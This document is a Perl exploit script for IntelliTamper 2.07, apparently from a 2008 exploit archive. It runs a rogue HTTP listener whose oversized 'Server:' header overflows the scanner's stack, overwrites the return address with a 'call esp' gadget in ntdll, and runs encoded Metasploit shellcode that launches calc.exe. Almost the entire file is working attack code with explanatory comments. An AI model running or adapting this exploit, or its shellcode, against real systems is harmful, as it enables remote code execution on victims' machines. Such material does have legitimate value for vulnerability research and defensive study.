# Title : IntelliTamper 2.07 (server header) Remote Code Execution Exploit
# Published : 2008-07-22
# Author : Koshi
#!/usr/bin/perl
#
# IntelliTamper 2.07 Remote Code Execution ( server header )
#
# By: Koshi
#
# Guido Landi finally did it, so I thought I'd throw one in there as well.
# This example assumes the target IntelliTamper instance is scanning exactly
# "http://127.0.0.1" (the host this listener runs on). Varying the URL even
# slightly -- "http://127.0.0.1:80" or "http://127.0.0.1/" -- may stop the
# exploit from working.
#
# gr33tz: Rima my baby, str0ke, messiah, Idol, old venny ;) , BU,
# and finally, Guido Landi for sparking my interest in exploiting
# this application.
#
#
use strict;
use warnings;
use IO::Socket;
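# --- Payload -----------------------------------------------------------------
#
# The oversized "Server:" header value is laid out as:
#   1536 filler bytes   -> reach the saved return address
#   4 bytes             -> new EIP: 0x7C958DB3, a "call esp" inside NTDLL.DLL
#   short padding       -> the bytes execution lands on
#   338-byte shellcode  -> Alpha2-encoded win32_exec, CMD=calc.exe
#
# NOTE(review): the "call esp" address is tied to the ntdll.dll build the
# author tested against; it has to be re-located for any other Windows
# version or service pack, otherwise the target just crashes.
#
# All "\x.." escapes below are required -- without the backslashes the
# strings are plain ASCII and the payload is neither 4 nor 338 bytes long.
my $overflow = 'A' x 1536;
my $fun = ''
    . "\xb3\x8d\x95\x7c"                                       # EIP (0x7C958DB3 call esp NTDLL.DLL)
    . "z3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0C"  # More buffer.
    . "AAAA2Cb3Cb4CBBBB";                                      # Starts executing here
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
my $sh3llcode =
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" .
    "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x63" .
    "\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x73\x41\x32\x41\x41\x32" .
    "\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x4b\x59\x59\x6c\x6a" .
    "\x48\x70\x44\x35\x50\x65\x50\x73\x30\x6e\x6b\x33\x75\x75\x6c\x4c" .
    "\x4b\x71\x6c\x53\x35\x74\x38\x55\x51\x78\x6f\x6e\x6b\x62\x6f\x36" .
    "\x78\x6c\x4b\x53\x6f\x65\x70\x36\x61\x6a\x4b\x43\x79\x6e\x6b\x76" .
    "\x54\x4e\x6b\x53\x31\x68\x6e\x64\x71\x6f\x30\x5a\x39\x4e\x4c\x6e" .
    "\x64\x6f\x30\x71\x64\x75\x57\x78\x41\x38\x4a\x74\x4d\x76\x61\x4f" .
    "\x32\x5a\x4b\x39\x64\x75\x6b\x43\x64\x67\x54\x74\x44\x74\x35\x48" .
    "\x65\x6c\x4b\x73\x6f\x37\x54\x57\x71\x38\x6b\x70\x66\x6e\x6b\x64" .
    "\x4c\x70\x4b\x4e\x6b\x33\x6f\x35\x4c\x64\x41\x38\x6b\x4c\x4b\x37" .
    "\x6c\x4c\x4b\x76\x61\x58\x6b\x6c\x49\x43\x6c\x55\x74\x56\x64\x4f" .
    "\x33\x44\x71\x4f\x30\x30\x64\x6c\x4b\x77\x30\x74\x70\x6f\x75\x49" .
    "\x50\x50\x78\x36\x6c\x4c\x4b\x33\x70\x54\x4c\x6e\x6b\x30\x70\x45" .
    "\x4c\x6e\x4d\x4c\x4b\x55\x38\x43\x38\x78\x6b\x44\x49\x6e\x6b\x4b" .
    "\x30\x6c\x70\x45\x50\x65\x50\x75\x50\x4c\x4b\x41\x78\x75\x6c\x51" .
    "\x4f\x30\x31\x7a\x56\x51\x70\x30\x56\x4f\x79\x38\x78\x6c\x43\x6b" .
    "\x70\x71\x6b\x72\x70\x61\x78\x4a\x50\x4d\x5a\x43\x34\x43\x6f\x43" .
    "\x58\x4c\x58\x49\x6e\x6c\x4a\x66\x6e\x43\x67\x69\x6f\x48\x67\x43" .
    "\x53\x73\x51\x50\x6c\x41\x73\x66\x4e\x70\x65\x72\x58\x71\x75\x37" .
    "\x70\x63";
my $buff = $overflow . $fun . $sh3llcode;

# Minimal HTTP/1.1 response; only the "Server:" header matters to the target.
# Content-Length covers the 8-byte "Exploit!" body (the trailing CRLF is extra).
my $resp = ''
    . "HTTP/1.1 200 OK\r\n"
    . "Connection: close\r\n"
    . "Content-Length: 8\r\n"
    . "Date: Mon, 21 Jul 2008 20:47:05 GMT\r\n"
    . "Content-Type: text/plain\r\n"
    . "Server: $buff\r\n"
    . "MIME-Version: 1.0\r\n\r\n"
    . "Exploit!\r\n";

# --- Listener ----------------------------------------------------------------
#
# Optional first argument: TCP port to listen on (default 80, so the target
# can be pointed at plain "http://<this host>").  Ports below 1024 need
# root/Administrator privileges to bind.
my $port = @ARGV ? shift @ARGV : 80;
die "Usage: $0 [port]\n"
    unless $port =~ /\A\d+\z/ && $port > 0 && $port < 65536;

my $sock = IO::Socket::INET->new(
    LocalPort => $port,
    Proto     => 'tcp',
    Listen    => 1,
    Reuse     => 1,
) or die "Cannot listen on port $port: $@\n";
print "Listening on port $port for connections...\n";

# Whoever connects first receives the payload -- nothing here verifies that
# the peer is the intended IntelliTamper instance.
my $new_sock = $sock->accept() or die "accept() failed: $!\n";
print "Got connection from client...\n";

# Pull (at most) the first 190 bytes of the client's request so it has sent
# something before we answer; the request content itself is ignored.
my $msg = '';
recv($new_sock, $msg, 190, 0);
print "Sending client packet...\n";
print {$new_sock} $resp;
print "Packet sent to client, voila?\n";

# Close the client connection first so the response is flushed to the peer,
# then release the listening socket.
close($new_sock);
close($sock);
print "Socket closed\n";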